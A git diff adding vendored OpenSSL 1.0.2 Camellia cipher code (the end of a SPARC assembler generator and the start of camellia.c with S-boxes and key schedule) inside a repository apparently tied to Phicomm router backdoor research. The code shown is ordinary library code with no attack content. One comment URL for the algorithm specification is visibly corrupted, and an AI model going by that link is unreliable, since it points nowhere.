+	be,pt		%icc, cmll128_t4_cbc_encrypt
+	nop
+	ba		cmll256_t4_cbc_encrypt
+	nop
+
+.Lcbc_decrypt:
+	be,pt		%icc, cmll128_t4_cbc_decrypt
+	nop
+	ba		cmll256_t4_cbc_decrypt
+	nop
+.type	Camellia_cbc_encrypt,#function
+.size	Camellia_cbc_encrypt,.-Camellia_cbc_encrypt
+___
+}
+
+&emit_assembler();
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/camellia.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/camellia.c
new file mode 100644
index 0000000..b4a6766
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/camellia.c
@@ -0,0 +1,584 @@
+/* crypto/camellia/camellia.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright 2006 NTT (Nippon Telegraph and Telephone Corporation) .
+ * ALL RIGHTS RESERVED.
+ *
+ * Intellectual Property information for Camellia:
+ *     http://info.isl.ntt.co.jp/crypt/eng/info/chiteki.html
+ *
+ * News Release for Announcement of Camellia open source:
+ *     http://www.ntt.co.jp/news/news06e/0604/060413a.html
+ *
+ * The Camellia Code included herein is developed by
+ * NTT (Nippon Telegraph and Telephone Corporation), and is contributed
+ * to the OpenSSL project.
+ *
+ * The Camellia Code is licensed pursuant to the OpenSSL open source
+ * license provided below.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+/*
+ * Algorithm Specification
+ * http://info.isl.llia/specicrypt/eng/camellia/specifications.html
+ */
+
+/*
+ * This release balances code size and performance. In particular key
+ * schedule setup is fully unrolled, because doing so *significantly*
+ * reduces amount of instructions per setup round and code increase is
+ * justifiable. In block functions on the other hand only inner loops
+ * are unrolled, as full unroll gives only nominal performance boost,
+ * while code size grows 4 or 7 times. Also, unlike previous versions
+ * this one "encourages" compiler to keep intermediate variables in
+ * registers, which should give better "all round" results, in other
+ * words reasonable performance even with not so modern compilers.
+ */
+
+#include "camellia.h"
+#include "cmll_locl.h"
+#include <string.h>
+#include <stdlib.h>
+
+/* 32-bit rotations */
+#if !defined(PEDANTIC) && !defined(OPENSSL_NO_ASM) && !defined(OPENSSL_NO_INLINE_ASM)
+# if defined(_MSC_VER) && (defined(_M_IX86) || defined(_M_AMD64) || defined(_M_X64))
+#  define RightRotate(x, s) _lrotr(x, s)
+#  define LeftRotate(x, s)  _lrotl(x, s)
+#  if _MSC_VER >= 1400
+#   define SWAP(x) _byteswap_ulong(x)
+#  else
+#   define SWAP(x) (_lrotl(x, 8) & 0x00ff00ff | _lrotr(x, 8) & 0xff00ff00)
+#  endif
+#  define GETU32(p)   SWAP(*((u32 *)(p)))
+#  define PUTU32(p,v) (*((u32 *)(p)) = SWAP((v)))
+# elif defined(__GNUC__) && __GNUC__>=2
+#  if defined(__i386) || defined(__x86_64)
+#   define RightRotate(x,s) ({u32 ret; asm ("rorl %1,%0":"=r"(ret):"I"(s),"0"(x):"cc"); ret; })
+#   define LeftRotate(x,s)  ({u32 ret; asm ("roll %1,%0":"=r"(ret):"I"(s),"0"(x):"cc"); ret; })
+#   if defined(B_ENDIAN)        /* stratus.com does it */
+#    define GETU32(p)   (*(u32 *)(p))
+#    define PUTU32(p,v) (*(u32 *)(p)=(v))
+#   else
+#    define GETU32(p)   ({u32 r=*(const u32 *)(p); asm("bswapl %0":"=r"(r):"0"(r)); r; })
+#    define PUTU32(p,v) ({u32 r=(v); asm("bswapl %0":"=r"(r):"0"(r)); *(u32 *)(p)=r; })
+#   endif
+#  elif defined(_ARCH_PPC) || defined(_ARCH_PPC64) || \
+        defined(__powerpc) || defined(__ppc__) || defined(__powerpc64__)
+#   define LeftRotate(x,s)  ({u32 ret; asm ("rlwinm %0,%1,%2,0,31":"=r"(ret):"r"(x),"I"(s)); ret; })
+#   define RightRotate(x,s) LeftRotate(x,(32-s))
+#  elif defined(__s390x__)
+#   define LeftRotate(x,s)  ({u32 ret; asm ("rll %0,%1,%2":"=r"(ret):"r"(x),"I"(s)); ret; })
+#   define RightRotate(x,s) LeftRotate(x,(32-s))
+#   define GETU32(p)   (*(u32 *)(p))
+#   define PUTU32(p,v) (*(u32 *)(p)=(v))
+#  endif
+# endif
+#endif
+
+#if !defined(RightRotate) && !defined(LeftRotate)
+# define RightRotate(x, s) ( ((x) >> (s)) + ((x) << (32 - s)) )
+# define LeftRotate(x, s)  ( ((x) << (s)) + ((x) >> (32 - s)) )
+#endif
+
+#if !defined(GETU32) && !defined(PUTU32)
+# define GETU32(p)   (((u32)(p)[0] << 24) ^ ((u32)(p)[1] << 16) ^ ((u32)(p)[2] <<  8) ^ ((u32)(p)[3]))
+# define PUTU32(p,v) ((p)[0] = (u8)((v) >> 24), (p)[1] = (u8)((v) >> 16), (p)[2] = (u8)((v) >>  8), (p)[3] = (u8)(v))
+#endif
+
+/* S-box data */
+#define SBOX1_1110 Camellia_SBOX[0]
+#define SBOX4_4404 Camellia_SBOX[1]
+#define SBOX2_0222 Camellia_SBOX[2]
+#define SBOX3_3033 Camellia_SBOX[3]
+static const u32 Camellia_SBOX[][256] = {
+    {0x70707000, 0x82828200, 0x2c2c2c00, 0xececec00, 0xb3b3b300, 0x27272700,
+     0xc0c0c000, 0xe5e5e500, 0xe4e4e400, 0x85858500, 0x57575700, 0x35353500,
+     0xeaeaea00, 0x0c0c0c00, 0xaeaeae00, 0x41414100, 0x23232300, 0xefefef00,
+     0x6b6b6b00, 0x93939300, 0x45454500, 0x19191900, 0xa5a5a500, 0x21212100,
+     0xededed00, 0x0e0e0e00, 0x4f4f4f00, 0x4e4e4e00, 0x1d1d1d00, 0x65656500,
+     0x92929200, 0xbdbdbd00, 0x86868600, 0xb8b8b800, 0xafafaf00, 0x8f8f8f00,
+     0x7c7c7c00, 0xebebeb00, 0x1f1f1f00, 0xcecece00, 0x3e3e3e00, 0x30303000,
+     0xdcdcdc00, 0x5f5f5f00, 0x5e5e5e00, 0xc5c5c500, 0x0b0b0b00, 0x1a1a1a00,
+     0xa6a6a600, 0xe1e1e100, 0x39393900, 0xcacaca00, 0xd5d5d500, 0x47474700,
+     0x5d5d5d00, 0x3d3d3d00, 0xd9d9d900, 0x01010100, 0x5a5a5a00, 0xd6d6d600,
+     0x51515100, 0x56565600, 0x6c6c6c00, 0x4d4d4d00, 0x8b8b8b00, 0x0d0d0d00,
+     0x9a9a9a00, 0x66666600, 0xfbfbfb00, 0xcccccc00, 0xb0b0b000, 0x2d2d2d00,
+     0x74747400, 0x12121200, 0x2b2b2b00, 0x20202000, 0xf0f0f000, 0xb1b1b100,
+     0x84848400, 0x99999900, 0xdfdfdf00, 0x4c4c4c00, 0xcbcbcb00, 0xc2c2c200,
+     0x34343400, 0x7e7e7e00, 0x76767600, 0x05050500, 0x6d6d6d00, 0xb7b7b700,
+     0xa9a9a900, 0x31313100, 0xd1d1d100, 0x17171700, 0x04040400, 0xd7d7d700,
+     0x14141400, 0x58585800, 0x3a3a3a00, 0x61616100, 0xdedede00, 0x1b1b1b00,
+     0x11111100, 0x1c1c1c00, 0x32323200, 0x0f0f0f00, 0x9c9c9c00, 0x16161600,
+     0x53535300, 0x18181800, 0xf2f2f200, 0x22222200, 0xfefefe00, 0x44444400,
+     0xcfcfcf00, 0xb2b2b200, 0xc3c3c300, 0xb5b5b500, 0x7a7a7a00, 0x91919100,
+     0x24242400, 0x08080800, 0xe8e8e800, 0xa8a8a800, 0x60606000, 0xfcfcfc00,
+     0x69696900, 0x50505000, 0xaaaaaa00, 0xd0d0d000, 0xa0a0a000, 0x7d7d7d00,
+     0xa1a1a100, 0x89898900, 0x62626200, 0x97979700, 0x54545400, 0x5b5b5b00,
+     0x1e1e1e00, 0x95959500, 0xe0e0e000, 0xffffff00, 0x64646400, 0xd2d2d200,
+     0x10101000, 0xc4c4c400, 0x00000000, 0x48484800, 0xa3a3a300, 0xf7f7f700,
+     0x75757500, 0xdbdbdb00, 0x8a8a8a00, 0x03030300, 0xe6e6e600, 0xdadada00,
+     0x09090900, 0x3f3f3f00, 0xdddddd00, 0x94949400, 0x87878700, 0x5c5c5c00,
+     0x83838300, 0x02020200, 0xcdcdcd00, 0x4a4a4a00, 0x90909000, 0x33333300,
+     0x73737300, 0x67676700, 0xf6f6f600, 0xf3f3f300, 0x9d9d9d00, 0x7f7f7f00,
+     0xbfbfbf00, 0xe2e2e200, 0x52525200, 0x9b9b9b00, 0xd8d8d800, 0x26262600,
+     0xc8c8c800, 0x37373700, 0xc6c6c600, 0x3b3b3b00, 0x81818100, 0x96969600,
+     0x6f6f6f00, 0x4b4b4b00, 0x13131300, 0xbebebe00, 0x63636300, 0x2e2e2e00,
+     0xe9e9e900, 0x79797900, 0xa7a7a700, 0x8c8c8c00, 0x9f9f9f00, 0x6e6e6e00,
+     0xbcbcbc00, 0x8e8e8e00, 0x29292900, 0xf5f5f500, 0xf9f9f900, 0xb6b6b600,
+     0x2f2f2f00, 0xfdfdfd00, 0xb4b4b400, 0x59595900, 0x78787800, 0x98989800,
+     0x06060600, 0x6a6a6a00, 0xe7e7e700, 0x46464600, 0x71717100, 0xbababa00,
+     0xd4d4d400, 0x25252500, 0xababab00, 0x42424200, 0x88888800, 0xa2a2a200,
+     0x8d8d8d00, 0xfafafa00, 0x72727200, 0x07070700, 0xb9b9b900, 0x55555500,
+     0xf8f8f800, 0xeeeeee00, 0xacacac00, 0x0a0a0a00, 0x36363600, 0x49494900,
+     0x2a2a2a00, 0x68686800, 0x3c3c3c00, 0x38383800, 0xf1f1f100, 0xa4a4a400,
+     0x40404000, 0x28282800, 0xd3d3d300, 0x7b7b7b00, 0xbbbbbb00, 0xc9c9c900,
+     0x43434300, 0xc1c1c100, 0x15151500, 0xe3e3e300, 0xadadad00, 0xf4f4f400,
+     0x77777700, 0xc7c7c700, 0x80808000, 0x9e9e9e00},
+    {0x70700070, 0x2c2c002c, 0xb3b300b3, 0xc0c000c0, 0xe4e400e4, 0x57570057,
+     0xeaea00ea, 0xaeae00ae, 0x23230023, 0x6b6b006b, 0x45450045, 0xa5a500a5,
+     0xeded00ed, 0x4f4f004f, 0x1d1d001d, 0x92920092, 0x86860086, 0xafaf00af,
+     0x7c7c007c, 0x1f1f001f, 0x3e3e003e, 0xdcdc00dc, 0x5e5e005e, 0x0b0b000b,
+     0xa6a600a6, 0x39390039, 0xd5d500d5, 0x5d5d005d, 0xd9d900d9, 0x5a5a005a,
+     0x51510051, 0x6c6c006c, 0x8b8b008b, 0x9a9a009a, 0xfbfb00fb, 0xb0b000b0,
+     0x74740074, 0x2b2b002b, 0xf0f000f0, 0x84840084, 0xdfdf00df, 0xcbcb00cb,
+     0x34340034, 0x76760076, 0x6d6d006d, 0xa9a900a9, 0xd1d100d1, 0x04040004,
+     0x14140014, 0x3a3a003a, 0xdede00de, 0x11110011, 0x32320032, 0x9c9c009c,
+     0x53530053, 0xf2f200f2, 0xfefe00fe, 0xcfcf00cf, 0xc3c300c3, 0x7a7a007a,
+     0x24240024, 0xe8e800e8, 0x60600060, 0x69690069, 0xaaaa00aa, 0xa0a000a0,
+     0xa1a100a1, 0x62620062, 0x54540054, 0x1e1e001e, 0xe0e000e0, 0x64640064,
+     0x10100010, 0x00000000, 0xa3a300a3, 0x75750075, 0x8a8a008a, 0xe6e600e6,
+     0x09090009, 0xdddd00dd, 0x87870087, 0x83830083, 0xcdcd00cd, 0x90900090,
+     0x73730073, 0xf6f600f6, 0x9d9d009d, 0xbfbf00bf, 0x52520052, 0xd8d800d8,
+     0xc8c800c8, 0xc6c600c6, 0x81810081, 0x6f6f006f, 0x13130013, 0x63630063,
+     0xe9e900e9, 0xa7a700a7, 0x9f9f009f, 0xbcbc00bc, 0x29290029, 0xf9f900f9,
+     0x2f2f002f, 0xb4b400b4, 0x78780078, 0x06060006, 0xe7e700e7, 0x71710071,
+     0xd4d400d4, 0xabab00ab, 0x88880088, 0x8d8d008d, 0x72720072, 0xb9b900b9,
+     0xf8f800f8, 0xacac00ac, 0x36360036, 0x2a2a002a, 0x3c3c003c, 0xf1f100f1,
+     0x40400040, 0xd3d300d3, 0xbbbb00bb, 0x43430043, 0x15150015, 0xadad00ad,
+     0x77770077, 0x80800080, 0x82820082, 0xecec00ec, 0x27270027, 0xe5e500e5,
+     0x85850085, 0x35350035, 0x0c0c000c, 0x41410041, 0xefef00ef, 0x93930093,
+     0x19190019, 0x21210021, 0x0e0e000e, 0x4e4e004e, 0x65650065, 0xbdbd00bd,
+     0xb8b800b8, 0x8f8f008f, 0xebeb00eb, 0xcece00ce, 0x30300030, 0x5f5f005f,
+     0xc5c500c5, 0x1a1a001a, 0xe1e100e1, 0xcaca00ca, 0x47470047, 0x3d3d003d,
+     0x01010001, 0xd6d600d6, 0x56560056, 0x4d4d004d, 0x0d0d000d, 0x66660066,
+     0xcccc00cc, 0x2d2d002d, 0x12120012, 0x20200020, 0xb1b100b1, 0x99990099,
+     0x4c4c004c, 0xc2c200c2, 0x7e7e007e, 0x05050005, 0xb7b700b7, 0x31310031,
+     0x17170017, 0xd7d700d7, 0x58580058, 0x61610061, 0x1b1b001b, 0x1c1c001c,
+     0x0f0f000f, 0x16160016, 0x18180018, 0x22220022, 0x44440044, 0xb2b200b2,
+     0xb5b500b5, 0x91910091, 0x08080008, 0xa8a800a8, 0xfcfc00fc, 0x50500050,
+     0xd0d000d0, 0x7d7d007d, 0x89890089, 0x97970097, 0x5b5b005b, 0x95950095,
+     0xffff00ff, 0xd2d200d2, 0xc4c400c4, 0x48480048, 0xf7f700f7, 0xdbdb00db,
+     0x03030003, 0xdada00da, 0x3f3f003f, 0x94940094, 0x5c5c005c, 0x02020002,
+     0x4a4a004a, 0x33330033, 0x67670067, 0xf3f300f3, 0x7f7f007f, 0xe2e200e2,
+     0x9b9b009b, 0x26260026, 0x37370037, 0x3b3b003b, 0x96960096, 0x4b4b004b,
+     0xbebe00be, 0x2e2e002e, 0x79790079, 0x8c8c008c, 0x6e6e006e, 0x8e8e008e,
+     0xf5f500f5, 0xb6b600b6, 0xfdfd00fd, 0x59590059, 0x98980098, 0x6a6a006a,
+     0x46460046, 0xbaba00ba, 0x25250025, 0x42420042, 0xa2a200a2, 0xfafa00fa,
+     0x07070007, 0x55550055, 0xeeee00ee, 0x0a0a000a, 0x49490049, 0x68680068,
+     0x38380038, 0xa4a400a4, 0x28280028, 0x7b7b007b, 0xc9c900c9, 0xc1c100c1,
+     0xe3e300e3, 0xf4f400f4, 0xc7c700c7, 0x9e9e009e},
+    {0x00e0e0e0, 0x00050505, 0x00585858, 0x00d9d9d9, 0x00676767, 0x004e4e4e,
+     0x00818181, 0x00cbcbcb, 0x00c9c9c9, 0x000b0b0b, 0x00aeaeae, 0x006a6a6a,
+     0x00d5d5d5, 0x00181818, 0x005d5d5d, 0x00828282, 0x00464646, 0x00dfdfdf,
+     0x00d6d6d6, 0x00272727, 0x008a8a8a, 0x00323232, 0x004b4b4b, 0x00424242,
+     0x00dbdbdb, 0x001c1c1c, 0x009e9e9e, 0x009c9c9c, 0x003a3a3a, 0x00cacaca,
+     0x00252525, 0x007b7b7b, 0x000d0d0d, 0x00717171, 0x005f5f5f, 0x001f1f1f,
+     0x00f8f8f8, 0x00d7d7d7, 0x003e3e3e, 0x009d9d9d, 0x007c7c7c, 0x00606060,
+     0x00b9b9b9, 0x00bebebe, 0x00bcbcbc, 0x008b8b8b, 0x00161616, 0x00343434,
+     0x004d4d4d, 0x00c3c3c3, 0x00727272, 0x00959595, 0x00ababab, 0x008e8e8e,
+     0x00bababa, 0x007a7a7a, 0x00b3b3b3, 0x00020202, 0x00b4b4b4, 0x00adadad,
+     0x00a2a2a2, 0x00acacac, 0x00d8d8d8, 0x009a9a9a, 0x00171717, 0x001a1a1a,
+     0x00353535, 0x00cccccc, 0x00f7f7f7, 0x00999999, 0x00616161, 0x005a5a5a,
+     0x00e8e8e8, 0x00242424, 0x00565656, 0x00404040, 0x00e1e1e1, 0x00636363,
+     0x00090909, 0x00333333, 0x00bfbfbf, 0x00989898, 0x00979797, 0x00858585,
+     0x00686868, 0x00fcfcfc, 0x00ececec, 0x000a0a0a, 0x00dadada, 0x006f6f6f,
+     0x00535353, 0x00626262, 0x00a3a3a3, 0x002e2e2e, 0x00080808, 0x00afafaf,
+     0x00282828, 0x00b0b0b0, 0x00747474, 0x00c2c2c2, 0x00bdbdbd, 0x00363636,
+     0x00222222, 0x00383838, 0x00646464, 0x001e1e1e, 0x00393939, 0x002c2c2c,
+     0x00a6a6a6, 0x00303030, 0x00e5e5e5, 0x00444444, 0x00fdfdfd, 0x00888888,
+     0x009f9f9f, 0x00656565, 0x00878787, 0x006b6b6b, 0x00f4f4f4, 0x00232323,
+     0x00484848, 0x00101010, 0x00d1d1d1, 0x00515151, 0x00c0c0c0, 0x00f9f9f9,
+     0x00d2d2d2, 0x00a0a0a0, 0x00555555, 0x00a1a1a1, 0x00414141, 0x00fafafa,
+     0x00434343, 0x00131313, 0x00c4c4c4, 0x002f2f2f, 0x00a8a8a8, 0x00b6b6b6,
+     0x003c3c3c, 0x002b2b2b, 0x00c1c1c1, 0x00ffffff, 0x00c8c8c8, 0x00a5a5a5,
+     0x00202020, 0x00898989, 0x00000000, 0x00909090, 0x00474747, 0x00efefef,
+     0x00eaeaea, 0x00b7b7b7, 0x00151515, 0x00060606, 0x00cdcdcd, 0x00b5b5b5,
+     0x00121212, 0x007e7e7e, 0x00bbbbbb, 0x00292929, 0x000f0f0f, 0x00b8b8b8,
+     0x00070707, 0x00040404, 0x009b9b9b, 0x00949494, 0x00212121, 0x00666666,
+     0x00e6e6e6, 0x00cecece, 0x00ededed, 0x00e7e7e7, 0x003b3b3b, 0x00fefefe,
+     0x007f7f7f, 0x00c5c5c5, 0x00a4a4a4, 0x00373737, 0x00b1b1b1, 0x004c4c4c,
+     0x00919191, 0x006e6e6e, 0x008d8d8d, 0x00767676, 0x00030303, 0x002d2d2d,
+     0x00dedede, 0x00969696, 0x00262626, 0x007d7d7d, 0x00c6c6c6, 0x005c5c5c,
+     0x00d3d3d3, 0x00f2f2f2, 0x004f4f4f, 0x00191919, 0x003f3f3f, 0x00dcdcdc,
+     0x00797979, 0x001d1d1d, 0x00525252, 0x00ebebeb, 0x00f3f3f3, 0x006d6d6d,
+     0x005e5e5e, 0x00fbfbfb, 0x00696969, 0x00b2b2b2, 0x00f0f0f0, 0x00313131,
+     0x000c0c0c, 0x00d4d4d4, 0x00cfcfcf, 0x008c8c8c, 0x00e2e2e2, 0x00757575,
+     0x00a9a9a9, 0x004a4a4a, 0x00575757, 0x00848484, 0x00111111, 0x00454545,
+     0x001b1b1b, 0x00f5f5f5, 0x00e4e4e4, 0x000e0e0e, 0x00737373, 0x00aaaaaa,
+     0x00f1f1f1, 0x00dddddd, 0x00595959, 0x00141414, 0x006c6c6c, 0x00929292,
+     0x00545454, 0x00d0d0d0, 0x00787878, 0x00707070, 0x00e3e3e3, 0x00494949,
+     0x00808080, 0x00505050, 0x00a7a7a7, 0x00f6f6f6, 0x00777777, 0x00939393,
+     0x00868686, 0x00838383, 0x002a2a2a, 0x00c7c7c7, 0x005b5b5b, 0x00e9e9e9,
+     0x00eeeeee, 0x008f8f8f, 0x00010101, 0x003d3d3d},
+    {0x38003838, 0x41004141, 0x16001616, 0x76007676, 0xd900d9d9, 0x93009393,
+     0x60006060, 0xf200f2f2, 0x72007272, 0xc200c2c2, 0xab00abab, 0x9a009a9a,
+     0x75007575, 0x06000606, 0x57005757, 0xa000a0a0, 0x91009191, 0xf700f7f7,
+     0xb500b5b5, 0xc900c9c9, 0xa200a2a2, 0x8c008c8c, 0xd200d2d2, 0x90009090,
+     0xf600f6f6, 0x07000707, 0xa700a7a7, 0x27002727, 0x8e008e8e, 0xb200b2b2,
+     0x49004949, 0xde00dede, 0x43004343, 0x5c005c5c, 0xd700d7d7, 0xc700c7c7,
+     0x3e003e3e, 0xf500f5f5, 0x8f008f8f, 0x67006767, 0x1f001f1f, 0x18001818,
+     0x6e006e6e, 0xaf00afaf, 0x2f002f2f, 0xe200e2e2, 0x85008585, 0x0d000d0d,
+     0x53005353, 0xf000f0f0, 0x9c009c9c, 0x65006565, 0xea00eaea, 0xa300a3a3,
+     0xae00aeae, 0x9e009e9e, 0xec00ecec, 0x80008080, 0x2d002d2d, 0x6b006b6b,
+     0xa800a8a8, 0x2b002b2b, 0x36003636, 0xa600a6a6, 0xc500c5c5, 0x86008686,
+     0x4d004d4d, 0x33003333, 0xfd00fdfd, 0x66006666, 0x58005858, 0x96009696,
+     0x3a003a3a, 0x09000909, 0x95009595, 0x10001010, 0x78007878, 0xd800d8d8,
+     0x42004242, 0xcc00cccc, 0xef00efef, 0x26002626, 0xe500e5e5, 0x61006161,
+     0x1a001a1a, 0x3f003f3f, 0x3b003b3b, 0x82008282, 0xb600b6b6, 0xdb00dbdb,
+     0xd400d4d4, 0x98009898, 0xe800e8e8, 0x8b008b8b, 0x02000202, 0xeb00ebeb,
+     0x0a000a0a, 0x2c002c2c, 0x1d001d1d, 0xb000b0b0, 0x6f006f6f, 0x8d008d8d,
+     0x88008888, 0x0e000e0e, 0x19001919, 0x87008787, 0x4e004e4e, 0x0b000b0b,
+     0xa900a9a9, 0x0c000c0c, 0x79007979, 0x11001111, 0x7f007f7f, 0x22002222,
+     0xe700e7e7, 0x59005959, 0xe100e1e1, 0xda00dada, 0x3d003d3d, 0xc800c8c8,
+     0x12001212, 0x04000404, 0x74007474, 0x54005454, 0x30003030, 0x7e007e7e,
+     0xb400b4b4, 0x28002828, 0x55005555, 0x68006868, 0x50005050, 0xbe00bebe,
+     0xd000d0d0, 0xc400c4c4, 0x31003131, 0xcb00cbcb, 0x2a002a2a, 0xad00adad,
+     0x0f000f0f, 0xca00caca, 0x70007070, 0xff00ffff, 0x32003232, 0x69006969,
+     0x08000808, 0x62006262, 0x00000000, 0x24002424, 0xd100d1d1, 0xfb00fbfb,
+     0xba00baba, 0xed00eded, 0x45004545, 0x81008181, 0x73007373, 0x6d006d6d,
+     0x84008484, 0x9f009f9f, 0xee00eeee, 0x4a004a4a, 0xc300c3c3, 0x2e002e2e,
+     0xc100c1c1, 0x01000101, 0xe600e6e6, 0x25002525, 0x48004848, 0x99009999,
+     0xb900b9b9, 0xb300b3b3, 0x7b007b7b, 0xf900f9f9, 0xce00cece, 0xbf00bfbf,
+     0xdf00dfdf, 0x71007171, 0x29002929, 0xcd00cdcd, 0x6c006c6c, 0x13001313,
+     0x64006464, 0x9b009b9b, 0x63006363, 0x9d009d9d, 0xc000c0c0, 0x4b004b4b,
+     0xb700b7b7, 0xa500a5a5, 0x89008989, 0x5f005f5f, 0xb100b1b1, 0x17001717,
+     0xf400f4f4, 0xbc00bcbc, 0xd300d3d3, 0x46004646, 0xcf00cfcf, 0x37003737,
+     0x5e005e5e, 0x47004747, 0x94009494, 0xfa00fafa, 0xfc00fcfc, 0x5b005b5b,
+     0x97009797, 0xfe00fefe, 0x5a005a5a, 0xac00acac, 0x3c003c3c, 0x4c004c4c,
+     0x03000303, 0x35003535, 0xf300f3f3, 0x23002323, 0xb800b8b8, 0x5d005d5d,
+     0x6a006a6a, 0x92009292, 0xd500d5d5, 0x21002121, 0x44004444, 0x51005151,
+     0xc600c6c6, 0x7d007d7d, 0x39003939, 0x83008383, 0xdc00dcdc, 0xaa00aaaa,
+     0x7c007c7c, 0x77007777, 0x56005656, 0x05000505, 0x1b001b1b, 0xa400a4a4,
+     0x15001515, 0x34003434, 0x1e001e1e, 0x1c001c1c, 0xf800f8f8, 0x52005252,
+     0x20002020, 0x14001414, 0xe900e9e9, 0xbd00bdbd, 0xdd00dddd, 0xe400e4e4,
+     0xa100a1a1, 0xe000e0e0, 0x8a008a8a, 0xf100f1f1, 0xd600d6d6, 0x7a007a7a,
+     0xbb00bbbb, 0xe300e3e3, 0x40004040, 0x4f004f4f}
+};
+
+/* Key generation constants */
+static const u32 SIGMA[] = {
+    0xa09e667f, 0x3bcc908b, 0xb67ae858, 0x4caa73b2, 0xc6ef372f, 0xe94f82be,
+    0x54ff53a5, 0xf1d36f1c, 0x10e527fa, 0xde682d1d, 0xb05688c2, 0xb3e6c1fd
+};
+
+/* The phi algorithm given in C.2.7 of the Camellia spec document. */
+/*
+ * This version does not attempt to minimize amount of temporary
+ * variables, but instead explicitly exposes algorithm's parallelism.
+ * It is therefore most appropriate for platforms with not less than
+ * ~16 registers. For platforms with less registers [well, x86 to be
+ * specific] assembler version should be/is provided anyway...
+ */
+#define Camellia_Feistel(_s0,_s1,_s2,_s3,_key) do {\
+        register u32 _t0,_t1,_t2,_t3;\
+\
+        _t0  = _s0 ^ (_key)[0];\
+        _t3  = SBOX4_4404[_t0&0xff];\
+        _t1  = _s1 ^ (_key)[1];\
+        _t3 ^= SBOX3_3033[(_t0 >> 8)&0xff];\
+        _t2  = SBOX1_1110[_t1&0xff];\
+        _t3 ^= SBOX2_0222[(_t0 >> 16)&0xff];\
+        _t2 ^= SBOX4_4404[(_t1 >> 8)&0xff];\
+        _t3 ^= SBOX1_1110[(_t0 >> 24)];\
+        _t2 ^= _t3;\
+        _t3  = RightRotate(_t3,8);\
+        _t2 ^= SBOX3_3033[(_t1 >> 16)&0xff];\
+        _s3 ^= _t3;\
+        _t2 ^= SBOX2_0222[(_t1 >> 24)];\
+        _s2 ^= _t2; \
+        _s3 ^= _t2;\
+} while(0)
+
+/*
+ * Note that n has to be less than 32. Rotations for larger amount
+ * of bits are achieved by "rotating" order of s-elements and
+ * adjusting n accordingly, e.g. RotLeft128(s1,s2,s3,s0,n-32).
+ */
+#define RotLeft128(_s0,_s1,_s2,_s3,_n) do {\
+        u32 _t0=_s0>>(32-_n);\
+        _s0 = (_s0<<_n) | (_s1>>(32-_n));\
+        _s1 = (_s1<<_n) | (_s2>>(32-_n));\
+        _s2 = (_s2<<_n) | (_s3>>(32-_n));\
+        _s3 = (_s3<<_n) | _t0;\
+} while (0)
+
+int Camellia_Ekeygen(int keyBitLength, const u8 *rawKey, KEY_TABLE_TYPE k)
+{
+    register u32 s0, s1, s2, s3;
+
+    k[0] = s0 = GETU32(rawKey);
+    k[1] = s1 = GETU32(rawKey + 4);
+    k[2] = s2 = GETU32(rawKey + 8);
+    k[3] = s3 = GETU32(rawKey + 12);
+
+    if (keyBitLength != 128) {
+        k[8] = s0 = GETU32(rawKey + 16);
+        k[9] = s1 = GETU32(rawKey + 20);
+        if (keyBitLength == 192) {
+            k[10] = s2 = ~s0;
+            k[11] = s3 = ~s1;
+        } else {
+            k[10] = s2 = GETU32(rawKey + 24);
+            k[11] = s3 = GETU32(rawKey + 28);
+        }
+        s0 ^= k[0], s1 ^= k[1], s2 ^= k[2], s3 ^= k[3];
+    }
+
+    /* Use the Feistel routine to scramble the key material */
+    Camellia_Feistel(s0, s1, s2, s3, SIGMA + 0);
+    Camellia_Feistel(s2, s3, s0, s1, SIGMA + 2);
+
+    s0 ^= k[0], s1 ^= k[1], s2 ^= k[2], s3 ^= k[3];
+    Camellia_Feistel(s0, s1, s2, s3, SIGMA + 4);
+    Camellia_Feistel(s2, s3, s0, s1, SIGMA + 6);
+
+    /* Fill the keyTable. Requires many block rotations. */
+    if (keyBitLength == 128) {
+        k[4] = s0, k[5] = s1, k[6] = s2, k[7] = s3;
+        RotLeft128(s0, s1, s2, s3, 15); /* KA <<< 15 */
